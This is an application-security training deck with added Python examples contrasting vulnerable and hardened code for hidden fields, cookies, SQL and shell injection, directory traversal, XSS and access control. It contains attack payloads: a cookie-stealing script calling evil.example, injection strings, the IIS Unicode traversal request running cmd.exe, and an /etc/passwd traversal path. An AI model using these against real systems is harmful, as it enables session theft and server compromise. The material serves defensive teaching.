
Page 1: Bank One App Sec Training

Web Application Security: “Securing from the Ground Up”

Presenters: Charles Smith & Michael Spaulding

Page 2: Bank One App Sec Training

What is Web Application Security?

Web applications exist in many forms. Some search, some count, others transfer money between your bank accounts. Web applications are employed to carry out many mission-critical tasks and, if anything is certain, our reliance upon them will continue to grow.

So, simply put, web application security is the achievement of an acceptable level of security assurance for a web application solution.

Security assurance = CIA: confidentiality (only authorized parties see the data), integrity (data and code are not altered without authorization) and availability (the application keeps serving legitimate users).

Page 3: Bank One App Sec Training

Why is web application security important?

Before software functionality could be delivered via the web, a developer's security concerns were limited to network- and OS-level threats, because the user base was confined to internal or WAN networks. All this has now changed. Web developers create software that runs on web servers reachable by anyone, anywhere. The scope and magnitude of their software delivery has increased exponentially, and with it a new class of security issues that are web-centric and bypass the legacy network- and OS-based defensive strategy entirely:

- Browser hijacking
- Cookie theft
- Server and client compromise
- Denial of service
- Abuse
- User privacy invasion

Page 4: Bank One App Sec Training

Pay Me Now Or Pay Me Later

Security problems are found in the Design, Build and Deployment/Maintenance phases of the application lifecycle. A problem identified in any phase after the initial build may send the code back to the design stage to be addressed, after which it must pass through the necessary development phases again. This adds time, cost and resource conflicts to the entire development process. A widely quoted rule of thumb is that fixing a problem found in the Testing phase is about 2-5 times more expensive than fixing it in the coding phase, and fixing a problem found in the Maintenance phase (deployment and beyond) is 5-7 times more expensive than fixing it in the coding phase.

Page 5: Bank One App Sec Training

What Is The Ultimate Cost For Not Addressing Security Early?

Page 6: Bank One App Sec Training

The Fourth Level of Web Security

Level  Layer             Behavior (threat)   Security (defense)
1      Desktop           Disruption          Antivirus
2      Transport         Interception        Encryption
3      Network           Illegal Access      Firewall
4      Web Applications  Web Perversion      Manual Patching

Page 7: Bank One App Sec Training

Digital Security Landscape

Desktop: Antivirus protection
Transport: Encryption (SSL)
Network: Firewalls / advanced routers
Web Applications: Manual patching and code review

Page 8: Bank One App Sec Training

What is a Web Application

The business logic that enables:

- the user's interaction with the web site
- transacting/interfacing with back-end data systems (databases, CRM, ERP etc.)

In the form of:

- 3rd party packaged software, i.e. web server, shopping cart software, personalization engines etc.
- code developed in-house / by a web builder / by a system integrator

Input and output flow through each layer of the application:

Browser -> User input (HTML/HTTP) -> Web server -> User interface code -> Front-end application -> Back-end application -> Database -> Data

A break in any layer breaks the whole application.

Page 9: Bank One App Sec Training

Web Threat Objectives?

The manipulation of web applications for:

Page 10: Bank One App Sec Training

Web Manipulation Examples

Through a browser, a hacker can use even the smallest bug or backdoor to change, or distort, the intent of the application.

Application                Attack                 Objective
Form field: collect data   Buffer overflow        Crash servers / close business
Online shopping            Hidden fields          eShoplifting
Sloppy code                Debug options          Download proprietary database
Text field: collect data   Cross-site scripting   eHijacking - get account info
Customer account           Cookie poisoning       Identity theft

Page 11: Bank One App Sec Training

97% of Sites Are Vulnerable

The results of over 300 AppAudits conducted with AppScan (breakdown chart by vulnerability type not reproduced)

Page 12: Bank One App Sec Training

The Web’s 7 Deadly Sins

- Hidden Field Manipulation
- Cookie Poisoning
- Application Buffer Overflow
- Third-Party Misconfiguration
- Cross-Site Scripting
- Parameter Tampering
- SQL Injection

Page 13: Bank One App Sec Training

Hidden Field Manipulation

Vulnerability explanation:

The application sends data to the client in a hidden form field (a price, an account number, a step in a workflow) and reads it back on the next request. Because the field lives in the browser, the user can edit it before submitting, so the value that comes back is not necessarily the value the application sent.

Why Hidden Field Manipulation:

Passing hidden fields is a simple and efficient way to pass information from one part of the application to another (or between two applications) without the use of complex back-end systems.

As a result of this manipulation:

The application acts on the changed information rather than the original data. Anything that round-trips through the client must be treated as untrusted: look the value up again on the server, or protect it with a keyed MAC so tampering is detected.
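The eShoplifting case from the manipulation table, worked in code. This is an added example, not from the Bank One deck: the catalogue, the form, the SKU names and the two checkout handlers are all constructed for illustration. The vulnerable handler believes the hidden price it sent out; the hardened one ignores it and prices the order from the server-side catalogue.

```python
"""Hidden-field manipulation: a checkout that trusts a hidden price field
versus one that re-derives the price on the server.

Added example, not from the Bank One deck. The catalogue, form layout and
handler names are constructed for illustration.
"""
from decimal import Decimal

# Server-side catalogue: the only place a price should ever come from.
CATALOGUE = {
    "SKU-1001": Decimal("499.00"),   # laptop (constructed)
    "SKU-2002": Decimal("19.99"),    # mouse  (constructed)
}

def render_order_form(sku: str) -> str:
    """Emit the order form. The price is sent to the client for display, but
    a vulnerable back end will read it back and believe it."""
    return (
        '<form method="post" action="/checkout">'
        f'<input type="hidden" name="sku" value="{sku}">'
        f'<input type="hidden" name="price" value="{CATALOGUE[sku]}">'
        '<input type="number" name="qty" value="1">'
        '<input type="submit" value="Buy">'
        "</form>"
    )

def checkout_vulnerable(form: dict) -> Decimal:
    """Charges whatever 'price' the client posted back. Anyone can edit the
    hidden field in the page source or in an intercepting proxy."""
    qty = int(form["qty"])
    return Decimal(form["price"]) * qty

def checkout_hardened(form: dict) -> Decimal:
    """Treats every posted field as untrusted: the price is looked up by SKU
    on the server and the quantity is range-checked. A posted 'price' field,
    if present, is simply ignored."""
    sku = form["sku"]
    if sku not in CATALOGUE:
        raise ValueError("unknown SKU")
    qty = int(form["qty"])
    if not 1 <= qty <= 100:
        raise ValueError("quantity out of range")
    return CATALOGUE[sku] * qty

# An honest submission and a tampered one (both constructed).
HONEST = {"sku": "SKU-1001", "price": "499.00", "qty": "1"}
TAMPERED = {"sku": "SKU-1001", "price": "0.01", "qty": "1"}   # eShoplifting

if __name__ == "__main__":
    print(render_order_form("SKU-1001"))
    print("vulnerable, honest  :", checkout_vulnerable(HONEST))    # 499.00
    print("vulnerable, tampered:", checkout_vulnerable(TAMPERED))  # 0.01
    print("hardened,   tampered:", checkout_hardened(TAMPERED))    # 499.00
```

If state genuinely has to round-trip through the client (a multi-step wizard, say), sign it with a server-side key, as shown in the cookie example later in this deck; the server-side lookup above is preferable whenever the authoritative value already exists on the server.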

Page 14-17: Bank One App Sec Training

Hidden Field Manipulation - Example (four screenshot slides; images not reproduced)

Page 18: Bank One App Sec Training

Cookie Poisoning

Vulnerability explanation:

The attacker edits the value of a cookie (a session ID, a user ID, a role flag, or any other state the application stored on the client) so that the application treats the request as belonging to a different session or user.

Why Cookie Poisoning:

Some session IDs are not secure: they are predictable or sequential, merely encoded rather than encrypted, or protected with a weak cipher or an unkeyed hash that anyone can recompute. This is generally due to a lack of cryptographic expertise on the part of developers.

As a result of this manipulation:

The attacker can assume the user's identity and gain access to that user's information: identity theft / impersonation.
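The three cookie designs the slide warns about, side by side, plus the two that hold up. Added example, not from the Bank One deck; the server secret, the user IDs, the cookie layout and the session table are constructed. Part 1 is a cookie that is only base64-encoded, part 2 appends an unkeyed hash, part 3 appends an HMAC under a server-held key, and part 4 keeps nothing meaningful on the client at all.

```python
"""Cookie poisoning: a cookie that merely encodes its contents is trivially
forged; an unkeyed hash does not help; an HMAC under a server secret, or an
opaque random session ID with server-side state, does.

Added example, not from the Bank One deck. SERVER_SECRET, the user IDs and
the cookie layout are constructed for illustration.
"""
import base64
import hashlib
import hmac
import secrets

SERVER_SECRET = b"constructed-demo-secret-rotate-me"   # would live in a vault

# --- 1. "Encrypted" cookie that is really just base64 -------------------------
def make_cookie_encoded(uid: int, role: str) -> str:
    return base64.b64encode(f"uid={uid};role={role}".encode()).decode()

def parse_cookie_encoded(cookie: str) -> dict:
    fields = base64.b64decode(cookie).decode().split(";")
    return dict(f.split("=", 1) for f in fields)

def forge_cookie(cookie: str, **changes) -> str:
    """What the attacker does: decode, edit, re-encode."""
    data = parse_cookie_encoded(cookie)
    data.update({k: str(v) for k, v in changes.items()})
    payload = ";".join(f"{k}={v}" for k, v in data.items())
    return base64.b64encode(payload.encode()).decode()

# --- 2. Unkeyed hash as a "signature": the attacker just recomputes it -------
def make_cookie_hashed(payload: str) -> str:
    return payload + "|" + hashlib.sha256(payload.encode()).hexdigest()

def verify_cookie_hashed(cookie: str) -> bool:
    payload, digest = cookie.rsplit("|", 1)
    return hmac.compare_digest(digest, hashlib.sha256(payload.encode()).hexdigest())

# --- 3. HMAC under a server-held secret: edits are detected --------------------
def make_cookie_hmac(payload: str) -> str:
    tag = hmac.new(SERVER_SECRET, payload.encode(), hashlib.sha256).hexdigest()
    return payload + "|" + tag

def verify_cookie_hmac(cookie: str) -> bool:
    payload, tag = cookie.rsplit("|", 1)
    expected = hmac.new(SERVER_SECRET, payload.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(tag, expected)   # constant-time comparison

# --- 4. Opaque session ID: the cookie carries no state to poison --------------
SESSIONS: dict = {}

def new_session(uid: int, role: str) -> str:
    sid = secrets.token_urlsafe(32)           # 256 bits of CSPRNG output
    SESSIONS[sid] = {"uid": uid, "role": role}
    return sid

def lookup_session(sid: str):
    return SESSIONS.get(sid)                  # a guessed or forged ID maps to nothing

if __name__ == "__main__":
    c = make_cookie_encoded(1042, "user")
    print("forged:", parse_cookie_encoded(forge_cookie(c, uid=1, role="admin")))
    good = make_cookie_hmac("uid=1042;role=user")
    print("hmac edit detected:", not verify_cookie_hmac(good.replace("user", "admin")))
```

Design 4 is the usual choice for session identity: the ID is unguessable, revocation is a dictionary delete, and nothing a user can edit changes who the server thinks they are. Design 3 is for the cases where state must live on the client; the payload is still readable, so do not put secrets in it, and do not confuse integrity (HMAC) with confidentiality (encryption).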

Page 19-22: Bank One App Sec Training

Cookie Poisoning - Example (four screenshot slides; images not reproduced)

Page 23: Bank One App Sec Training

Backdoor & Debug options

Vulnerability explanation:

The application contains hidden debug options that can be activated by sending a specific parameter or sequence of requests.

Why Backdoor and Debug options:

1. Leaving debug options in the code lets developers find and fix bugs faster.

2. Developers leave backdoors as a way of guaranteeing their own access to the system.

As a result of this manipulation:

Activating the hidden debug option gives the hacker far more access to the application than any normal user, often unrestricted. Debug code should be stripped from production builds rather than hidden, and debugging must never be switchable by a request parameter.

Page 24-26: Bank One App Sec Training

Backdoor & Debug options - Example (three screenshot slides; images not reproduced)

Page 27: Bank One App Sec Training

Application Buffer Overflow

Vulnerability explanation:

Sending more characters into a form field than the receiving code has reserved space for. The excess overwrites adjacent memory and the program misbehaves.

Why Application Buffer Overflow:

The application does not check the length of the input before copying it into a fixed-size buffer.

As a result of this manipulation:

The application crashes and in many cases takes the whole site down (denial of service). In other cases the input is crafted so that the application executes code supplied by the attacker.

Page 28-32: Bank One App Sec Training

Application Buffer Overflow - Example (five screenshot slides; images not reproduced)

Page 33: Bank One App Sec Training

Stealth Commanding

Vulnerability explanation:

Hiding commands inside what looks like ordinary form input so that the server executes them. Today this is usually called command injection; SQL injection, listed among the seven deadly sins, is the same flaw aimed at the database.

Why Stealth Commanding:

Applications tend to build a new command (a shell command line, a database query, a script) from the content of a field, assuming that the content is only data and not executable code.

As a result of this manipulation:

The hacker can run any command on the web server with the privileges of the server process, including a complete shutdown, defacement, or access to all information.
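Both flavors of stealth commanding in one runnable block: a login query built by string concatenation and a "lookup" command built as a shell string, each beside its fixed form. Added example, not from the Bank One deck. The user table, the login handler and the lookup handler are constructed; `echo` stands in for a real network tool such as nslookup so that the block runs offline, and the two payloads are constructed attacker input.

```python
"""Stealth commanding (injection): a field the application treats as data is
parsed as part of a command by the database engine or by /bin/sh.

Added example, not from the Bank One deck. The user table and both handlers
are constructed; 'echo' stands in for a real tool such as nslookup.
"""
import re
import sqlite3
import subprocess

DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE users (name TEXT, pw TEXT)")
DB.execute("INSERT INTO users VALUES ('alice', 'correct horse'), ('bob', 'hunter2')")

# --- SQL injection: query built from strings vs. bound parameters --------------
def login_vulnerable(name: str, pw: str) -> bool:
    # A quote character in pw closes the literal; the rest of pw is SQL.
    q = f"SELECT 1 FROM users WHERE name = '{name}' AND pw = '{pw}'"
    return DB.execute(q).fetchone() is not None

def login_hardened(name: str, pw: str) -> bool:
    # Placeholders: the driver passes pw as a value, never as SQL text.
    q = "SELECT 1 FROM users WHERE name = ? AND pw = ?"
    return DB.execute(q, (name, pw)).fetchone() is not None

# --- OS command injection: shell string vs. argv list plus an allow-list -------
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")

def lookup_vulnerable(host: str) -> str:
    # /bin/sh parses the whole line: ';', '|', '`...`', '$(...)' all take effect.
    out = subprocess.run("echo " + host, shell=True, capture_output=True, text=True)
    return out.stdout

def lookup_hardened(host: str) -> str:
    if not HOSTNAME_RE.match(host):
        raise ValueError("invalid hostname")
    # argv form: host is exactly one argument and no shell is involved.
    out = subprocess.run(["echo", host], capture_output=True, text=True)
    return out.stdout

SQLI_PAYLOAD = "x' OR '1'='1"                  # constructed attacker input
SHELL_PAYLOAD = "example.com; echo INJECTED"   # constructed attacker input

if __name__ == "__main__":
    print("SQL vulnerable  :", login_vulnerable("nobody", SQLI_PAYLOAD))   # True
    print("SQL hardened    :", login_hardened("nobody", SQLI_PAYLOAD))     # False
    print("shell vulnerable:", lookup_vulnerable(SHELL_PAYLOAD).split())   # [..., 'INJECTED']
```

The allow-list on the hostname is defense in depth, not the fix: the fix is that user data never reaches a parser as code, which the `?` placeholders and the argv list achieve regardless of what the string contains.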

Page 34-35: Bank One App Sec Training

Stealth Commanding - Example (two screenshot slides; images not reproduced)

Page 36: Bank One App Sec Training

Known Vulnerabilities

Vulnerability explanation:

Some technology used in sites has inherent weaknesses that a persistent hacker, or a hacker with automated scanning tools, can exploit easily. Users depend on patches from the vendor. Once a weakness is discovered in one site, it can be used against every site running the same component.

Why Known Vulnerabilities:

Third-party products have bugs (Microsoft IIS etc.). Because they appear in many sites they are examined thoroughly by a large number of hackers.

As a result of this manipulation:

Once a bug is found, large parts of the Internet are scanned and exploited. The actual result varies with the vulnerability type, but the ability to read arbitrary files, obtain the administrator's password and take control of the site is not unusual. For code you did not write, tracking vendor advisories and patching promptly is the only defense.

Page 37: Bank One App Sec Training

Known Vulnerabilities - Example

The IIS Unicode directory traversal (Microsoft bulletin MS00-078): %c0%af is an overlong UTF-8 encoding of "/", so each "..%c0%af" is a "../" that the server's traversal check did not recognize because the check ran before decoding. The request walks out of the web root and runs cmd.exe:

/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:

Page 38: Bank One App Sec Training

3rd Party Misconfigurations

Vulnerability explanation:

A misconfiguration, or human error during the installation of 3rd party software, leaves default passwords or settings unchanged: an open invitation for attack.

Why 3rd party misconfigurations:

They occur during the installation and maintenance of the 3rd party application.

As a result of this manipulation:

Through a configuration error (default credentials, sample applications left installed, administrative interfaces exposed) a hacker could, for example, create a new database that renders the existing one unusable by the site.

Page 39: Bank One App Sec Training

3rd Party Misconfiguration - Example

The IIS sample-file viewer showcode.asp, left installed under /msadc/Samples, displays whatever file the "source" parameter names; a "../" sequence in that parameter reads files outside the samples directory (the path on the slide is truncated):

/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../..
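Both of the preceding examples are directory traversal: the IIS Unicode bug checks the URL for "../" and decodes afterwards, and showcode.asp never checks at all. The block below reproduces the check-then-decode mistake against the slide's request and shows the order that works. Added example, not from the Bank One deck and not IIS code: DOCROOT, the sample paths and the target file in the showcode-style path are constructed, and lenient_utf8() only imitates a permissive decoder.

```python
"""Directory traversal through a known component bug. IIS checked the URL for
'../' and only then decoded it, so an overlong UTF-8 encoding of '/' (%c0%af)
slipped through. Decoding strictly first, normalising, and then proving the
result lies under the document root stops the encoded form and the plain
'../' form alike.

Added example, not from the Bank One deck. DOCROOT and the paths are
constructed; lenient_utf8() imitates the permissive decoder, it is not IIS.
"""
import posixpath
import urllib.parse

DOCROOT = "/var/www/site"   # constructed document root

def lenient_utf8(raw: bytes) -> str:
    """Decodes 2-byte sequences without rejecting overlong forms, so that
    0xC0 0xAF becomes U+002F '/'. Other bytes pass through as Latin-1."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)

def resolve_vulnerable(url_path: str) -> str:
    """Check first, decode second: the flaw pattern behind MS00-078."""
    if ".." in url_path.split("/"):           # looks at the still-encoded path
        raise PermissionError("traversal rejected")
    decoded = lenient_utf8(urllib.parse.unquote_to_bytes(url_path))
    return posixpath.normpath(DOCROOT + "/" + decoded)

def resolve_hardened(url_path: str) -> str:
    """Decode exactly once and strictly, normalise, then test containment."""
    raw = urllib.parse.unquote_to_bytes(url_path)
    try:
        decoded = raw.decode("utf-8")          # overlong sequences raise here
    except UnicodeDecodeError as e:
        raise PermissionError("malformed encoding") from e
    if "\x00" in decoded:
        raise PermissionError("NUL byte in path")
    full = posixpath.normpath(posixpath.join(DOCROOT, decoded.lstrip("/")))
    if posixpath.commonpath([DOCROOT, full]) != DOCROOT:
        raise PermissionError("outside document root")
    return full

# The slide's Unicode request (path part only) and a showcode-style plain
# '../' path whose target file is constructed for the demo.
IIS_UNICODE = "/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe"
SHOWCODE_STYLE = "/msadc/Samples/../../../../../etc/passwd"

if __name__ == "__main__":
    print("vulnerable resolves to:", resolve_vulnerable(IIS_UNICODE))  # /winnt/system32/cmd.exe
    for p in (IIS_UNICODE, SHOWCODE_STYLE):
        try:
            resolve_hardened(p)
        except PermissionError as e:
            print("hardened rejects", p, "->", e)
```

Two details matter in the hardened version: decoding happens exactly once (a second pass would reopen the door to double-encoded "%252e%252e"), and the final commonpath test is what actually enforces the boundary; the "../" checks that servers tend to bolt on are only heuristics over an encoding they have not finished interpreting.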

Page 40: Bank One App Sec Training

Cross Site Scripting

Vulnerability explanation:

A third party creates a link (or sends an email) whose URL contains a parameter holding a script. When the victim follows the link, the site copies the parameter into its response and the victim's browser runs the script as if it were the site's own code, with the site's cookies and session.

Why Cross Site Scripting:

Many parameters are written into the HTML of subsequent responses without their content being checked or encoded, so markup in them is interpreted rather than displayed.

As a result of this manipulation:

"Virtual hijacking" of the session. Any information flowing between the legitimate user and the site can be read, manipulated, or transmitted to the evil third party.

Page 41: Bank One App Sec Training

Cross Site Scripting - Example

1. The victim receives "Press this link to get to your bank". Underlying link: http://www.mybank.com?a=<evil javascript>

2. The bank's page reflects the parameter and prompts "Enter your login information" (Username, Password).

3. The JavaScript program collects and sends the user name and password to the attacker.
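The slide's link, reconstructed end to end: the payload rides in parameter a, the server reflects it, and output encoding is what makes the difference. Added example, not from the Bank One deck. The page template, the cookie-stealing payload, the attribute-breakout payload and the host evil.example are constructed; the parameter name a follows the link shown on the slide.

```python
"""Reflected cross-site scripting: a URL parameter copied into the page
unescaped runs as script in the victim's browser, inside the bank's origin.
Context-aware output encoding keeps it text.

Added example, not from the Bank One deck. The template and both payloads
are constructed; parameter 'a' follows the link on the slide.
"""
import html
import urllib.parse

# What the attacker puts after ?a= in the mailed link (constructed).
SCRIPT_PAYLOAD = "<script>new Image().src='http://evil.example/c?'+document.cookie</script>"
# A payload for the attribute context: no '<' needed, just a closing quote.
ATTR_PAYLOAD = '" autofocus onfocus="alert(1)'

def evil_link(site: str = "http://www.mybank.com") -> str:
    """The link in the phishing mail; the script travels inside parameter a."""
    return site + "/?a=" + urllib.parse.quote(SCRIPT_PAYLOAD, safe="")

def param_from_link(link: str) -> str:
    """What the server receives once the victim clicks."""
    return urllib.parse.parse_qs(urllib.parse.urlsplit(link).query)["a"][0]

def render_vulnerable(a: str) -> str:
    """Reflects the parameter into an element body and a quoted attribute."""
    return f'<h1>Welcome back, {a}</h1>\n<input name="a" value="{a}">'

def render_hardened(a: str) -> str:
    """html.escape(quote=True) encodes & < > " ' so the value is inert in both
    the element body and a double-quoted attribute. Script, URL and CSS
    contexts need their own encoders; this alone is not enough there."""
    safe = html.escape(a, quote=True)
    return f'<h1>Welcome back, {safe}</h1>\n<input name="a" value="{safe}">'

def has_live_script(page: str) -> bool:
    """Crude detector used by the test: an unescaped <script> tag, or the
    injected event-handler attribute, survived into the rendered page."""
    low = page.lower()
    return "<script" in low or 'onfocus="alert(1)"' in low

if __name__ == "__main__":
    a = param_from_link(evil_link())
    print(render_vulnerable(a))
    print(render_hardened(a))
```

Encode at output time, in the context the data lands in, rather than trying to filter "bad" input: the attribute payload above contains no angle brackets at all and sails through any filter that only looks for tags.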

Page 42: Bank One App Sec Training

Parameter Tampering

Vulnerability explanation:

Parameters (query strings, form fields, cookies) are the application's way of obtaining information from the client. Any of them can be changed before the request is sent, for example by editing the URL in the browser's address bar.

Why Parameter Tampering:

Developers focus on the legal values of parameters and how they should be used. Little, if any, attention is given to unexpected values.

As a result of this manipulation:

The application performs a function its developer never intended, such as returning another customer's information.

Page 43: Bank One App Sec Training

Parameter Tampering - Example

Page 44: Bank One App Sec Training

Parameter Tampering - Example

Page 45: Bank One App Sec Training

Forceful Browsing

Vulnerability explanation:

By "guessing" the names of files and directories, the hacker can view them directly without going through the business logic (and the authorization checks) that normally leads to those objects.

Why forceful browsing:

1. Default files are left behind by the installation process.

2. New files that should not be exposed, and old files that should have been removed, are left outside the normal flow by mistake.

As a result of this manipulation:

Content (log files, administration facilities, application source code) is revealed through direct file and directory access.
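Parameter tampering and forceful browsing are the same failure seen twice: the server never asks whether this user may have this object or this URL. The block below puts one access-control layer in front of both, and because it also bounds the type and length of every parameter it applies the length check the buffer overflow slide calls for before input reaches code that might overflow on it. Added example, not from the Bank One deck: ROUTES, ACCOUNTS, USERS, the parameter rules and the request shape are all constructed.

```python
"""Parameter tampering and forceful browsing: both are missing server-side
authorization. One dispatcher checks route, role, parameter shape and object
ownership, in that order, and denies anything it does not know.

Added example, not from the Bank One deck. ROUTES, ACCOUNTS, USERS and the
parameter rules are constructed for illustration.
"""
import re

ACCOUNTS = {
    "10001": {"owner": "alice", "balance": 250},
    "10002": {"owner": "bob", "balance": 9000},
}
USERS = {"alice": "customer", "bob": "customer", "carol": "admin"}

# Every URL the application serves and the role it needs. Default deny:
# anything not listed (old files, backups, admin pages reached by guessing)
# is refused, whatever happens to exist on disk.
ROUTES = {"/account": "customer", "/admin/users": "admin"}

# name -> (pattern, maximum length); any other parameter name is rejected,
# so a leftover 'debug=1' switch cannot be reached from a request either.
PARAM_RULES = {"acct": (re.compile(r"^\d{1,12}$"), 12)}

class Denied(Exception):
    """Raised for 403/404 conditions; the caller maps it to a status code."""

def validate_params(params: dict) -> dict:
    clean = {}
    for name, value in params.items():
        if name not in PARAM_RULES:
            raise Denied(f"unexpected parameter {name!r}")
        pattern, max_len = PARAM_RULES[name]
        if len(value) > max_len or not pattern.match(value):
            raise Denied(f"bad value for {name!r}")   # oversized or wrong type
        clean[name] = value
    return clean

def get_account_vulnerable(params: dict) -> dict:
    """The tamperable version: whoever is logged in gets whichever account
    number they typed into the URL."""
    return ACCOUNTS[params["acct"]]

def handle(user: str, path: str, params: dict) -> dict:
    """Hardened dispatcher: known route, sufficient role, valid parameters,
    and ownership of the requested object."""
    required = ROUTES.get(path)
    if required is None:
        raise Denied("not found")               # forceful browsing stops here
    role = USERS.get(user)
    if role != required and role != "admin":
        raise Denied("forbidden")
    params = validate_params(params)
    if path == "/account":
        acct = ACCOUNTS.get(params.get("acct"))
        if acct is None or (acct["owner"] != user and role != "admin"):
            raise Denied("forbidden")           # parameter tampering stops here
        return acct
    return dict(USERS)                          # /admin/users

def allowed(user: str, path: str, params: dict) -> bool:
    """True if handle() would serve the request, False if it would deny it."""
    try:
        handle(user, path, params)
        return True
    except Denied:
        return False

if __name__ == "__main__":
    print("vulnerable, alice asks for 10002:", get_account_vulnerable({"acct": "10002"}))
    print("hardened,   alice asks for 10002:", allowed("alice", "/account", {"acct": "10002"}))
    print("hardened,   alice tries /admin  :", allowed("alice", "/admin/users", {}))
```

The ownership check is the part most often missing in practice: role checks alone let every customer read every customer's account, which is exactly the "giving access to customer information" outcome the parameter tampering slide describes.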

Page 46-48: Bank One App Sec Training

Forceful Browsing - Example (three screenshot slides; images not reproduced)

Page 49: Bank One App Sec Training

Thank You

Feedback?

Recommendations?